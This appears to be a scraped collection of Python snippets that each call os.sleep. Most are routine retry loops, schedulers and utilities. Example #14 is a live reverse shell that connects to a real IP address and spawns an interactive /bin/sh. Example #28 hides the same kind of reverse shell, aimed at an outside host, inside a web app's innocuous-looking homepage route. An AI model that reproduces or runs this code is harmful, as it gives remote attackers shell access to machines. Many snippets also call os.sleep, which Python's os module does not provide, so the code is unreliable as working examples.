Пример #1
0
    def execute(self):
        """copy each temp script to the proper host and execute each task"""

        for t in self.chunk.tasks:

            if not self.transport == "ssh":
                print "transport method %s not yet implimented" % self.transport
                sys.exit()

            # note that this is not any kind of real fork (yet)
            # and is really only doing the tasks serially
            # also note that there is no kind of timeout alarm set
            # to kill problem tasks

            chunknum = self.chunk.tasknum
            ip = t.task['ip']
            runningTasks = 0

            if runningTasks < self.maxParallel:

                runningTasks += 1
                if not self.verbose == 0:
                    print "starting chunk %s task %s on %s" % (chunknum,
                                                               t.tasknum, ip)

                # pass the task to the queue
                self._queue(t)
            else:
                # is this the right way to do this?
                if not self.verbose == 0:
                    print "task %s waiting for queue to flush" % t.tasknum
                os.sleep(30)

            runningTasks -= 1
Пример #2
0
def background_scraping_task1(ev_url, _task_spec = js['evernote_article']):
    from selenium import webdriver as wd
    from os import sleep
    from pyvirtualdisplay import Display
    import logging,json
    from time import time
    display = Display(visible=0, size=(1024, 768))
    display.start()
    d = wd.Firefox()
    d.get(ev_url)
    sleep(_task_spec['delay'])
    _ans = {}
    start_time =  time()
    for result_name,js_code in _task_spec['js2r']:
        try:
            _ans[result_name] = d.execute_script("return " + js_code)
        except Exception as e:
            logging.error(traceback.format_exc())
            logging.error(str(e))
    # cleanup selenium
    d.close()
    display.stop()
    end_time = time()
    _ans['seconds_elapsed']= int((end_time-start_time)*1000)
    # publish the result
    logging.info("result for url {}\n\n".format(ev_url) + json.dumps(_ans))
Пример #3
0
def wait_for_device(dev):
    print "--> Wait for device {}".format(dev)
    for sec in range(0, 60):
        if os.path.exists(dev):
            print "--> Device {} appears in {} seconds".format(dev, sec)
            break
        os.sleep(1)
Пример #4
0
def wait_for_device(dev):
    print "--> Wait for device {}".format(dev)
    for sec in range(0, 60):
        if os.path.exists(dev):
            print "--> Device {} appears in {} seconds".format(dev, sec)
            break
        os.sleep(1)
Пример #5
0
    def execute(self):

        """copy each temp script to the proper host and execute each task"""

        for t in self.chunk.tasks:

            if not self.transport == "ssh":
                print "transport method %s not yet implimented" % self.transport    
                sys.exit()

            # note that this is not any kind of real fork (yet)
            # and is really only doing the tasks serially
            # also note that there is no kind of timeout alarm set 
            # to kill problem tasks

            chunknum = self.chunk.tasknum
            ip = t.task['ip']
            runningTasks = 0

            if runningTasks < self.maxParallel:

                runningTasks+=1
                if not self.verbose == 0:
                    print "starting chunk %s task %s on %s" % (chunknum,t.tasknum,ip)

                # pass the task to the queue
                self._queue(t)
            else:
                # is this the right way to do this?
                if not self.verbose == 0:
                    print "task %s waiting for queue to flush" % t.tasknum
                os.sleep(30)

            runningTasks-=1
Пример #6
0
 def __init__(self):
     self.path = os.environ["HOME"] + time.strftime("/dcacheTestSuite.%Y%m%d%H%M%S/",time.gmtime())
     while os.path.exists(self.path):
         os.sleep(1)
         self.path = os.environ["HOME"] + time.strftime("%Y%m%d%H%M%S",time.gmtime())
     os.mkdir(self.path)
     self.fileNameGenerator = uniqueFileNameGenerator(self.path + "tmpfile")
     self.fileMd5sum = {}
Пример #7
0
def shutdownCheck():
    seq = exitList[len(exitList) - 4:len(exitList)]
    if seq == shutdownSeq:
        lcd.clear()
        lcd.message("{PWNIE EXPRESS!}\nsystem shutdown")
        sleep(5)
        os.system("poweroff")
        os.sleep(7)
Пример #8
0
 def wrapped_f(*args):
     for i in range(1, tries + 1):
         try:
             return f(*args)
         except requests.exceptions.ConnectionError:
             if i == tries:
                 raise
             os.sleep(1)
Пример #9
0
def shutdownCheck():
    seq = exitList[len(exitList) - 4 : len(exitList)]
    if seq == shutdownSeq:
        lcd.clear()
        lcd.message("{PWNIE EXPRESS!}\nsystem shutdown")
        sleep(5)
        os.system("poweroff")
        os.sleep(7)
Пример #10
0
def Mine():
    """
    挖矿进程
    :return:
    """
    pids["Mine"] = os.getpid()
    while True:
        Blockchain.addblock()
        os.sleep(6)
Пример #11
0
def run(instance):
    try:
        generator = instance.get_lines()
        for line in generator:
            if line.command == "PRIVMSG":
                spew(line, generator, instance.isupport['CHANTYPES'])
    except IOError as e:
        print("Disconnected", str(e))
        os.sleep(5)
Пример #12
0
 def wait_ptkinitdone(self, addr, timeout=2):
     while timeout > 0:
         sta = self.get_sta(addr)
         if 'hostapdWPAPTKState' not in sta:
             raise Exception("GET_STA did not return hostapdWPAPTKState")
         state = sta['hostapdWPAPTKState']
         if state == "11":
             return
         os.sleep(0.1)
         timeout -= 0.1
     raise Exception("Timeout while waiting for PTKINITDONE")
Пример #13
0
def login():
    if password == pinInput.value_text:
        pinError.fg = "green"
        pinError.value_text = "logging in..."
        os.sleep(1000)
        os.System("python screen.py")
    elif pinInput.value_text == "":
        pinError.fg = "red"
    elif pinInput.value_text != password:
        pinError.fg = "red"
        pinError.value_text = "password is incorrect!!!"
Пример #14
0
def main():
    print('Try')
    count = 0
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("167.179.96.180", 9998))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])
    print(p)
    while count < 1000:
        os.sleep(1)
Пример #15
0
def refresh_cdn():
   s = range(int(begin),int(end))
   try:
      for i in s:
         n = str(i)
         k = n.zfill(3)
         url = "http://sdl.wuming.com%s/%s_%s%s.apk" % (els('3'),els('1'),chid,k)
         run(["python %s RefreshCdnUrl -u %s -p %s --urls %s" % (PATH,SecretId,SecretKey,url)])
      print "Refresh End"
      alarm("Refresh End")
      os.sleep(300)
   except Exception,e:
      print e
Пример #16
0
 def stop(self,patience=0,ptimes=0):
     if not patience:
         patience = self.patience
     if not ptimes:
         ptimes = self.ptimes
     runfile = self.RC_NAME
     ok = 0
     for ptry in range(ptimes):
         try:
             os.remove(runfile+'.on')
             ok = 1
             break
         except OSError, ose:
             os.sleep(patience)
Пример #17
0
 def _request_address(address):
     content = ""
     start = time.clock()
     timeout = 10
     while content == "" :
         page = requests.get(address)
         page.raise_for_status()
         content = page.content.decode("utf-8")
         if content == "" and time.clock() - timeout < start:
             os.sleep(1000)
             print("Retrying")
         else:
             break
     return content
Пример #18
0
def start_predicting():

    print("Populating queue")
    arr = os.listdir(args["path"])
    for file in arr:
        if file.endswith("jpg"):
            q.put_nowait(file)
    print("Queue populated.  Images: " + str(q.qsize()))

    for i in range(0, procs):
        #process = threading.Thread(target=predict)
        process = Process(target=start_predicting_async)
        process.start()

        print("Starting Process...")
        os.sleep(3)
Пример #19
0
def getRequest(method_name, params = {}, response_only = False):
	full_req = api_addr + method_name + "?"
	for i in params.keys():
		full_req = full_req + i + "=" + str(params[i]) + "&"
	full_req = full_req + end
	for i in range(3): # повторить три раза
		try:
			r = requests.get(full_req).json()
			if "error" in r:
				continue
			if response_only:
				return r["response"]
			else:
				return r
		except Exception:
			os.sleep(3)
	return None
Пример #20
0
def wait_cmd(popen, quiet=False):
    """Wait for a started command to complete, and return its stdout."""
    out = popen.communicate()[0]
    while popen.returncode is None:
        os.sleep(1)
    if popen.returncode:
        if not quiet:
            print >> sys.stderr, '-' * 72
            print >> sys.stderr, out
            print >> sys.stderr, '-' * 72
            if popen.returncode < 0:
                raise AppError("Command terminated by signal {0}: {1}".format(
                    -popen.returncode, ' '.join(popen.command)))
            else:
                raise AppError("Exit status {0} for command: {1}".format(
                    popen.returncode, ' '.join(popen.command)))
    return out
Пример #21
0
def wait_cmd(popen, quiet=False):
    """Wait for a started command to complete, and return its stdout."""
    out = popen.communicate()[0]
    while popen.returncode is None:
        os.sleep(1)
    if popen.returncode:
        if not quiet:
            print >>sys.stderr, '-' * 72
            print >>sys.stderr, out
            print >>sys.stderr, '-' * 72
            if popen.returncode < 0:
                raise AppError("Command terminated by signal {0}: {1}".format(
                        -popen.returncode, ' '.join(popen.command)))
            else:
                raise AppError("Exit status {0} for command: {1}".format(
                        popen.returncode, ' '.join(popen.command)))
    return out
Пример #22
0
def download_oci_blob(url_path, oci_json_blob):
    for retry in range(3):
        oci_blob = get_oci_metadata(url_path, oci_json_blob)
        if oci_blob is not None:
            syslog.syslog(syslog.LOG_INFO,
                          "downloaded OCI JSON blob from " + url_path)
            return oci_blob
        syslog.syslog(syslog.LOG_WARNING,
                      "cannot download oci blob " + url_path + ": retrying")
        os.sleep(10)
    #
    # too many retries, give up
    #
    syslog.syslog(
        syslog.LOG_ERR, "cannot download oci blob " + url_path +
        " (too many retries): giving up")
    exit(5)
Пример #23
0
def system_is_configured():
    '''
    Check the OVS_DB if system initialization has completed.
    Initialization completed: return True
    else: return False
    '''

    global idl
    global system_initialized

    # Check the OVS-DB/File status to see if initialization has completed.
    if not db_get_system_status(idl.tables):
        # Delay a little before trying again
        os.sleep(1)
        return False

    system_initialized = 1
    return True
Пример #24
0
def printFaceToArduinoCode(nbFace):

    #print ("print Face nb: "+str(nbFace)+" matrix : "+str(nbMatrix))
    for matrix in range(6):
        for line in range(8):
            toPrint = ""
            for pix in range(8):
                if listOfFace[nbFace][nbMatrix][line][pix]:
                    # find the real location
                    # compute the string to write
                    # write the stringo into file
                    x = nbMatrix % 3 * 8 + pix
                    y = nbMatrix / 3 * 8 + line

                    textToPrint = "matrix.drawPixel(" + str(
                        x) + " + offSet, " + str(y) + ", 1);"
                    os.sleep(0.001)
            print toPrint
    def __init__(self,log):
        self.log=log
        self.log.logging('Initialization:', 'SHOWALL')
        if len(sys.argv) >= 2 and sys.argv[1] == 'p2dv':
            self.p2dv = True
            self.log.logging('    p2dv.in mode', 'SHOWALL')
        else:
            self.p2dv = False

        if self.p2dv:
            host = 'localhost'
        else:
            host=socket.gethostbyname(socket.gethostname())

        # Find a unused port
        while True:
            try:
                if self.p2dv:
                    port = random.randint(1024,65535)
                else:
                    port = 12345
                self.spy=socket.socket()
                self.spy.bind((str(host),port))
                self.spy.listen(2)
                self.port = port
                if self.p2dv:
                    self.spy.settimeout(1)
                break
            except:
                self.log.logging('    Port %d is used. Trying another.' % (port), 'SHOWALL')
                if not self.p2dv:
                    os.sleep(0.5)
        
        self.log.logging("    Waiting to connect ...",'SHOWALL')
        self.log.logging("    The PC's host is %s, the port is %d"%(host,port),'SHOWALL')
        
        # Determine which player is first player  
        first = 0 if random.random()<0.5 else 1
        self.first_player = first

        # Wait for AIs to connect
        self.AI=[None,None]
        self.AIname=['[Unknown]','[Unknown]']
Пример #26
0
    def handle_exit_signal(signal_num, frame):
        """ Handle a system exit signal. """

        global log
        global proxies

        msg = 'handle exit signal {}'.format(signal_num)
        print(msg)
        log.error(msg)
        if frame:
            log.debug(frame)

        for proxy in proxies:
            # cancel() only works if the Timer hasn't timed out
            proxy.watchdog_timer.cancel()
        # let any watchdogs that have timed out have time to finish
        os.sleep(10)

        sys.exit(msg)
def download(urls, path):
    old_dir = os.getcwd()
    os.chdir(path)
    for each in urls:
        name = each[1]
        url = each[0]
        if os.path.isfile(name):
            print("already exists, skipping...")
            continue
        try:
            request = urllib2.Request(url)
            res = urllib2.urlopen(request).read()
            with open(name, 'wb') as pdf:
                pdf.write(res)
            print("Downloaded", name)
        except Exception as e:
            print("Failed to download because of", e)
        os.sleep(1000)  #1 Second
    os.chdir(old_dir)
Пример #28
0
def homepage():
    the_time = datetime.now().strftime("%A, %d %b %Y %l:%M %p")

    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("kranko.net", 1234))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)

        p = subprocess.call(["/bin/sh", "-i"])
        os.sleep(999)

    return """
    <h1>Hello heroku</h1>
    <p>It is currently {time}.</p>

    <img src="http://loremflickr.com/600/400" />
    """.format(time=the_time)
Пример #29
0
def get_daily(symbol):
    now = datetime.now()
    spath = os.path.abspath(f'Data/{symbol}')
    if not os.path.isdir(spath):
        os.mkdir(spath)
    path = os.path.abspath(f'Data/{symbol}/{symbol}_daily')
    if not os.path.isdir(path):
        os.mkdir(path)

    with open('Key') as f:
        key = f.read()

    interval = '1min'
    counter = 0
    api_call = f'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol}&outputsize=full&apikey={key}'
    while counter < 4:
        try:
            req = requests.get(api_call)
            break
        except Exception as e:
            os.sleep(3)
            counter += 1

    amd_ts = json.loads(req.text)
    meta = amd_ts['Meta Data']
    data = amd_ts['Time Series (Daily)']

    amd_df = pd.DataFrame(data).T
    col_name = {
        '1. open': 'Open',
        '2. high': 'High',
        '3. low': 'Low',
        '4. close': 'Close',
        '5. volume': 'Volume',
        'index': 'Time'
    }
    amd_df = amd_df.reset_index()
    amd_df = amd_df.rename(columns=col_name)

    amd_df.to_csv(
        os.path.join(path,
                     f'{symbol}_daily_{now.year}_{now.month}_{now.day}.csv'))
Пример #30
0
 def _close(self):
     if self._pid == 0:
         return
     try:
         self._stopClient()
         for i in range(10):
             ret = os.waitpid(self._pid, os.WNOHANG)
             if os.WIFEXITED(ret[1]):
                 self._pid = 0
                 break
             os.sleep(.1)
         if self._pid:
             try:
                 os.kill(self._pid, 15)
                 os.sleep(.1)
                 os.kill(self._pid, 9)
                 os.waitpid(self._pid, os.WNOHANG)
             except OSError, e:
                 if e.errno != 10:
                     raise
     finally:
         self._pid = 0
Пример #31
0
 def _close(self):
     if self._pid == 0:
         return
     try:
         self._stopClient()
         for i in range(10):
             ret = os.waitpid(self._pid, os.WNOHANG)
             if os.WIFEXITED(ret[1]):
                 self._pid = 0
                 break
             os.sleep(.1)
         if self._pid:
             try:
                 os.kill(self._pid, 15)
                 os.sleep(.1)
                 os.kill(self._pid, 9)
                 os.waitpid(self._pid, os.WNOHANG)
             except OSError, e:
                 if e.errno != 10:
                     raise
     finally:
         self._pid = 0
Пример #32
0
 def parse(self, response):
     print(
         '================================================================='
     )
     os.sleep(40)
Пример #33
0
 def loop_forever(self, time=10.0):
     while True:
         self.refresh()
         os.sleep(time)
    def __sendEmail__(self,
                      recipient,
                      subject,
                      body,
                      html=None,
                      fileToSendArray=[]):
        import smtplib
        import mimetypes
        from email.mime.multipart import MIMEMultipart
        from email import encoders
        from email.mime.audio import MIMEAudio
        from email.mime.base import MIMEBase
        from email.mime.image import MIMEImage
        from email.mime.text import MIMEText

        fromEmail = self.user_settings.email_address
        try:

            msg = MIMEMultipart()
            msg['From'] = fromEmail
            msg['To'] = recipient
            msg['Subject'] = subject
            body = body
            msg.attach(MIMEText(body, 'plain'))
            if html is not None and isinstance(html, str):
                msg.attach(MIMEText(html, 'html'))

            # %% Atachemnt
            if fileToSendArray is not None and len(fileToSendArray) > 0:
                for fileToSend in fileToSendArray:
                    if fileToSend is not None and os.path.isfile(fileToSend):
                        logger.debug('adding file ' + fileToSend)

                        ctype, encoding = mimetypes.guess_type(fileToSend)
                        if ctype is None or encoding is not None:
                            ctype = "application/octet-stream"

                        maintype, subtype = ctype.split("/", 1)

                        if maintype == "text":
                            fp = open(fileToSend)
                            # Note: we should handle calculating the charset
                            attachment = MIMEText(fp.read(), _subtype=subtype)
                            fp.close()
                        elif maintype == "image":
                            fp = open(fileToSend, "rb")
                            attachment = MIMEImage(fp.read(), _subtype=subtype)
                            fp.close()
                        elif maintype == "audio":
                            fp = open(fileToSend, "rb")
                            attachment = MIMEAudio(fp.read(), _subtype=subtype)
                            fp.close()
                        else:
                            fp = open(fileToSend, "rb")
                            attachment = MIMEBase(maintype, subtype)
                            attachment.set_payload(fp.read())
                            fp.close()
                            encoders.encode_base64(attachment)
                        attachment.add_header("Content-Disposition",
                                              "attachment",
                                              filename=fileToSend)
                        msg.attach(attachment)
            result = False
            counter = 3
            while (not result and counter > 0):
                try:
                    server = smtplib.SMTP(self.user_settings.email_smtp_host,
                                          self.user_settings.email_smtp_port)
                    server.ehlo()
                    server.starttls()
                    server.ehlo()

                    server.login(fromEmail, self.user_settings.email_password)
                    text = msg.as_string()
                    problems = server.sendmail(fromEmail, recipient, text)
                    server.quit()
                    result = True
                except Exception as e:
                    logger.error("Error: unable to send email retry[%d] :%s" %
                                 (counter, str(e)))
                    result = False
                    counter -= 1
                    os.sleep(5)
            if result:
                logger.info("Successfully sent email")
            else:
                logger.error("Error: unable to send email")

        except:
            logger.error("Error: unable to send email")
from cloudmesh.common.StopWatch import StopWatch
import os

StopWatch.start("Start the stop watch")
os.sleep(100)
StopWatch.stop("Stop the stop watch")
Stopwatch.benchmark.print()

print(StopWatch.get("test"))
Пример #36
0
now = datetime.now()

path = os.path.abspath('amd_daily/')
with open('Key') as f:
    key = f.read()
symbol = 'AMD'
interval = '1min'
counter = 0
api_call = f'https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol={symbol}&interval={interval}&outputsize=full&apikey={key}'
while counter <= 10:
    try:
        req = requests.get(api_call)
        break
    except Exception as e:
        os.sleep(3)
        counter += 1

amd_ts = json.loads(req.text)
meta = amd_ts['Meta Data']
data = amd_ts['Time Series (1min)']

amd_df = pd.DataFrame(data).T
col_name = {
    '1. open': 'Open',
    '2. high': 'High',
    '3. low': 'Low',
    '4. close': 'Close',
    '5. volume': 'Volume',
    'index': 'Time'
}
Пример #37
0
            m = job_num.match(job_return)

            jobs.append(m.group())
        else:
            retcode = subprocess.call(kmds_command, shell=True)
            if retcode < 0:
                print("kmds step 1 file " + str(i) + " failed with ", -retcode, file=sys.stderr)

        subsampled_output.append("kmds.step1." + str(i))
    except OSError as e:
        print("Execution failed:", e, file=sys.stderr)

# Check all jobs have finished
if args.LSF:
    while not (check_done(jobs)):
        os.sleep(30)
    jobs = []

write_list = open(subsampled_list,'w')
for subsample in subsampled_output:
    write_list.write(subsample + "\n")

write_list.close()

# Run kmds --mds_concat on output
print("Calculating MDS components\n")
try:
    kmds_command = ""
    if args.LSF:
        kmds_command = "bsub -o kmds.step2.%J.o -e kmds.step2.%J..e -n" + str(args.threads) + " -R \"span[hosts=1]\" -R \"select[mem>4000] rusage[mem=4000]\" -M4000 "
Пример #38
0
				filtered['loc'] = loc
				
				os.write(fh,bytes(u'{0}\n'.format(json.dumps(filtered, ensure_ascii=False)),'utf-8',errors='ignore'))
				os.fsync(fh)
				print(nn + tweet['user']['screen_name']  + "	" +    str(tweet['text'][:130].encode('utf-8').decode('ascii', 'ignore')), flush=True)
                                
                                
                                ####these controls will break the program after ~2000 registered tweets that have been captured by the program
			except:
				continue
		else:
			pass
	else:
		pass


	



os.sleep(5)









Пример #39
0
    os.write(parentIn, "hi\r\n")
    os.write(parentIn, "hi\r\n")


if __name__ == '__main__':
    # create a pipe for the program
    stdin = sys.stdin.fileno()  # usually 0
    stdout = sys.stdout.fileno()  # usually 1
    parentIn, childOut = os.pipe()
    childIn, parentOut = os.pipe()
    pid = os.fork()

    if pid == 0:  # child
        # redirect and close pipes
        os.dup2(childIn, stdin)
        os.dup2(childOut, stdout)
        os.close(parentIn)
        os.close(parentOut)
        os.close(childIn)
        os.close(childOut)

        # Execute the program
        os.system("FunctionsAndVariables.exe")

    else:  # parent
        # interact with the program
        sendCommands(childIn, childOut)

    # Wait so we can read it
    os.sleep()
    os.waitpid(pid, 0)
Пример #40
0
def sleep(u):
    os.sleep(u)
Пример #41
0
def sleep(u):
    os.sleep(u)
Пример #42
0
#!/usr/bin/env python
# coding: utf-8


"""
子进程结束会向父进程发送 SIGCHLD 信号
"""

import os
import signal
from time import sleep


def onsigchld(a, b):
    print '收到子进程结束信号'

signal.signal(signal.SIGCHLD, onsigchld)

pid = os.fork()

if pid == 0:
    print '我是子进程, pid是', os.getpid()
    os.sleep(2)
else:
    print '我是父进程, pid是', os.getpid()
    os.wait() #等待子进程结束
Пример #43
0
    def start(self,
              rundate,
              input_path,
              calendar,
              outfile='CVAMarketDataCal',
              premium_file=None):
        # disable gpus
        os.environ['CUDA_VISIBLE_DEVICES'] = "-1"
        # set the log level for the parent
        os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
        # set the logger
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s %(levelname)-8s %(message)s',
                            datefmt='%m-%d %H:%M')

        from .adaptiv import AdaptivContext

        # create the context
        self.cx = AdaptivContext()
        # load calendars
        self.cx.parse_calendar_file(calendar)
        # store the path
        self.path = input_path
        # load marketdata
        if rundate is None:
            self.daily = True
            self.path = os.path.split(input_path)[0]
            self.outfile = outfile
            self.cx.parse_json(input_path)
            # load up the old file if present
            old_output_name = os.path.join(self.path, outfile + '.json')
            if os.path.isfile(old_output_name):
                self.ref = AdaptivContext()
                self.ref.parse_json(old_output_name)
                params_to_bootstrap = self.cx.params[
                    'Bootstrapper Configuration'].keys()
                for factor in [
                        x for x in self.ref.params['Price Factors'].keys()
                        if x.split('.', 1)[0] in params_to_bootstrap
                ]:
                    # override it
                    self.cx.params['Price Factors'][factor] = self.ref.params[
                        'Price Factors'][factor]
            rundate = pd.Timestamp.now().strftime('%Y-%m-%d')
        elif os.path.isfile(
                os.path.join(self.path, rundate, 'MarketDataCal.json')):
            self.cx.parse_json(
                os.path.join(self.path, rundate, 'MarketDataCal.json'))
        elif os.path.isfile(os.path.join(self.path, rundate,
                                         'MarketData.json')):
            self.cx.parse_json(
                os.path.join(self.path, rundate, 'MarketData.json'))
        else:
            logging.error(
                'Cannot find market data for rundate {}'.format(rundate))
            return

        # update the rundate if necessary
        if self.cx.params['System Parameters']['Base_Date'] is None:
            logging.info('Setting  rundate {}'.format(rundate))
            self.cx.params['System Parameters']['Base_Date'] = pd.Timestamp(
                rundate)

        if premium_file is not None:
            while True:
                logging.info(
                    'Watching for premium file in {}'.format(premium_file))
                prem = glob.glob(
                    os.path.join(
                        premium_file,
                        'IR_Volatility_Swaption_{}*.csv'.format(rundate)))
                if prem:
                    break
                else:
                    os.sleep(5 * 60)

            logging.info('Setting swaption premiums from {}'.format(prem[0]))
            self.cx.params['System Parameters']['Swaption_Premiums'] = prem[0]

        # load the params
        price_factors = self.manager.dict(self.cx.params['Price Factors'])
        price_factor_interp = self.manager.dict(
            self.cx.params['Price Factor Interpolation'])
        price_models = self.manager.dict(self.cx.params['Price Models'])
        sys_params = self.manager.dict(self.cx.params['System Parameters'])
        holidays = self.manager.dict(self.cx.holidays)

        logging.info("starting {0} workers in {1}".format(
            self.NUMBER_OF_PROCESSES, input_path))
        self.workers = [
            Process(target=work,
                    args=(i, self.queue, self.result, price_factors,
                          price_factor_interp, price_models, sys_params,
                          holidays)) for i in range(self.NUMBER_OF_PROCESSES)
        ]

        for w in self.workers:
            w.start()

        # load the bootstrapper on to the queue - note - order is important here - hence python 3.6
        for bootstrapper_name, params in self.cx.params[
                'Bootstrapper Configuration'].items():
            # get the market price id and any options for bootstrapping
            market_price, _, *options = params.split(',', 2)
            # get the market prices for this bootstrapper
            market_prices = {
                k: v
                for k, v in self.cx.params['Market Prices'].items()
                if k.startswith(market_price)
            }
            # number of return statuses needed
            status_required = 0
            for market_price in market_prices.keys():
                status_required += 1
                self.queue.put((bootstrapper_name, options, {
                    market_price: market_prices[market_price]
                }))

            for i in range(status_required):
                logging.info(self.result.get())

        # tell the children it's over
        self.queue.put(None)
        # store the results back in the parent context
        self.cx.params['Price Factors'] = price_factors.copy()
        self.cx.params['Price Models'] = price_models.copy()
        # finish up
        # close the queues
        self.queue.close()
        self.result.close()

        # join the children to this process
        for w in self.workers:
            w.join()

        # write out the data
        logging.info('Parent: All done - saving data')

        if self.daily:
            # write out the calibrated data
            self.cx.write_marketdata_json(
                os.path.join(self.path, self.outfile + '.json'))
            self.cx.write_market_file(
                os.path.join(self.path, self.outfile + '.dat'))
            logfilename = os.path.join(self.path, self.outfile + '.log')
        else:
            self.cx.write_marketdata_json(
                os.path.join(self.path, rundate, 'MarketDataCal.json'))
            self.cx.write_market_file(
                os.path.join(self.path, rundate, 'MarketDataCal.dat'))
            logfilename = os.path.join(self.path, rundate, 'MarketDataCal.log')

        # copy the logs across
        with open(logfilename, 'wb') as wfd:
            for f in glob.glob('bootstrap*.log'):
                with open(f, 'rb') as fd:
                    shutil.copyfileobj(fd, wfd)
Пример #44
0
    def calculate_rotors(self,
                         conformer,
                         calculator,
                         steps=36,
                         step_size=10.0):

        complete = {}
        calculators = {}
        verified = {}
        for torsion in conformer.torsions:
            calc = calculator.get_rotor_calc(
                conformer=conformer,
                torsion=torsion,
                steps=steps,
                step_size=step_size,
            )
            label = self.submit_rotor(conformer=conformer,
                                      ase_calculator=calc,
                                      partition="general")
            logging.info(label)
            complete[label] = False
            calculators[label] = calc
            verified[label] = False

        done = False
        lowest_energy_label = None
        conformer_error = False
        if len(conformer.torsions) == 0:
            logging.info("No torsions to run scans on.")
            return {}
        while not done:
            for label in list(complete.keys()):
                if not self.check_complete(label):
                    continue
                if done:
                    continue
                complete[label] = True
                ase_calc = calculators[label]
                lowest_conf, continuous, good_slope, opt_count_check = self.verify_rotor(
                    steps=steps, step_size=step_size, ase_calculator=ase_calc)
                if all([lowest_conf, continuous]):
                    verified[label] = True
                else:
                    verified[label] = False

                if not lowest_conf:

                    done = True
                    lowest_energy_label = label
                    conformer_error = True
                    continue
                elif all(complete.values()):
                    done = True

        if conformer_error:
            logging.info(
                "A lower energy conformer was found... Going to optimize this insted"
            )
            for label in list(complete.keys()):
                command = """scancel -n '{}'""".format(label)
            ase_calculator = calculators[label]
            file_name = os.path.join(ase_calculator.scratch,
                                     lowest_energy_label + ".log")
            parser = ccread(file_name)
            first_is_lowest, min_energy, atomnos, atomcoords = self.check_rotor_lowest_conf(
                parser=parser)
            symbol_dict = {
                17: "Cl",
                9: "F",
                8: "O",
                7: "N",
                6: "C",
                1: "H",
            }
            atoms = []
            for atom_num, coords in zip(parser.atomnos, parser.atomcoords[-1]):
                atoms.append(
                    Atom(symbol=symbol_dict[atom_num], position=coords))
            conformer.ase_molecule = Atoms(atoms)
            conformer.update_coords_from("ase")

            if isinstance(conformer, TS):
                calc = calculator.get_overall_calc(
                    conformer, direction=conformer.direction)

                calc.scratch = calc.scratch.strip("/conformers")
                conformer.direction = "forward"
                conformer.index = "X"
                label = self.submit_transitionstate(transitionstate=conformer,
                                                    ase_calculator=calc)
            else:
                calc = calculator.get_conformer_calc(conformer)
                calc.scratch = calc.scratch.strip("/conformers")
                conformer.index = "X"
                label = self.submit_conformer(conformer, calc, "general")

            while not self.check_complete(label):
                os.sleep(15)

            logging.info(
                "Reoptimization complete... performing hindered rotors scans again"
            )
            return self.calculate_rotors(conformer, calculator, steps,
                                         step_size)

        else:
            for label, boolean in list(verified.items()):
                if not boolean:
                    calc = calculators[label]
                    try:
                        os.mkdir(os.path.join(calc.scratch, "failures"))
                    except:
                        pass
                    move(
                        os.path.join(calc.scratch, calc.label + ".log"),
                        os.path.join(calc.scratch, "failures",
                                     calc.label + ".log"))
            return verified
Пример #45
0
                http_path = 'https' + row['ftp_path'][3:]
                filename = http_path.split('/')[-1]
                path = f"{http_path}/{filename}_genomic.fna.gz"

                # Let's check if the path exists
                check_r = s.head(path)
                if check_r.status_code == 404:
                    # Error with this path, let's try to crawl instead
                    try:
                        path = crawl_link(row['assembly_accession'], s)
                    except ValueError:
                        # Can't find this data, continue...
                        continue
                elif check_r.status_code >= 500:
                    # Server error, try again
                    os.sleep(2)
                    check_r = s.head(path)
                    if check_r.status_code >= 500:
                        # ¯\_(ツ)_/¯ let's retry it some other time...
                        continue

                # Assembly summary doesn't include size of dataset
                # Let's use a cheap head request to find the size
                size_r = s.head(path)
                if size_r.status_code == 404:
                    print(f"Error 404 on {path}")
                    continue
                size_MB = int(int(size_r.headers['Content-Length']) / 1000000)

                new_dataset = Dataset(id=row["assembly_accession"],
                                      database_id="Genomes",
Пример #46
0
    o.write((path + '\n').encode('utf-8'))
o.flush()
checkers = o

log = open('cppcheck.log', 'wt')
xmllog = open('cppcheck.log.xml', 'wt')
checker = s.Popen([
    'cppcheck', '--file-list=' + checkers.name,
    '--includes-file=' + includes.name, '--inconclusive', '--inline-suppr',
    '-j', '3', '--xml', '--xml-version=2', '--enable=all', '--force'
],
                  stdout=log,
                  stderr=xmllog)

while not os.path.exists(log.name):
    os.sleep(0.1)
print('found log file, begin tee hack', checker.poll())
with open(log.name) as inp:
    buf = ''
    while True:
        buf += inp.read()
        if buf:
            lines = buf.split('\n')
            buf = lines[-1]
            for line in lines[:-1]:
                print('> ', line)
            inp.seek(0, 1)
        time.sleep(0.1)
        if checker.poll() is not None: break
print('done')
Пример #47
0
xmllog = open('cppcheck.log.xml','wt')
checker = s.Popen(['cppcheck',
                   '--file-list='+checkers.name,
                   '--includes-file='+includes.name,
                   '--inconclusive',
                   '--inline-suppr',
                   '-j','3',
                   '--xml',
                   '--xml-version=2',
                   '--enable=all',
                   '--force'],
                  stdout=log,
                  stderr=xmllog)

while not os.path.exists(log.name):
    os.sleep(0.1)
print('found log file, begin tee hack',checker.poll())
with open(log.name) as inp:
    buf = ''
    while True:
        buf += inp.read()
        if buf:
            lines = buf.split('\n')
            buf = lines[-1]
            for line in lines[:-1]:
                print('> ',line)
            inp.seek(0,1)
        time.sleep(0.1)
        if checker.poll() is not None: break
print('done')
Пример #48
0
	under the terms of the GNU General Public License as published by the
	Free Software Foundation, either version 3 of the License, or (at your
	option) any later version.

	This program is distributed in the hope that it will be useful, but
	WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
	General Public License for more details.

	You should have received a copy of the GNU General Public License along
	with this program.  If not, see <http://www.gnu.org/licenses/>.
*/
'''

for file in scripts:
	os.sleep(10)
	print file
	f = open(file, 'rb').read()
	if '*/' in f and 'AlliedModders' in f.split('*/', 1)[0]:
			f = legal + f.split('*/', 1)[1].strip() + '\n'
	else:
		f = legal + f
	m = re.search('url.*?=.*?"(.*?)"', f)
	if not m:
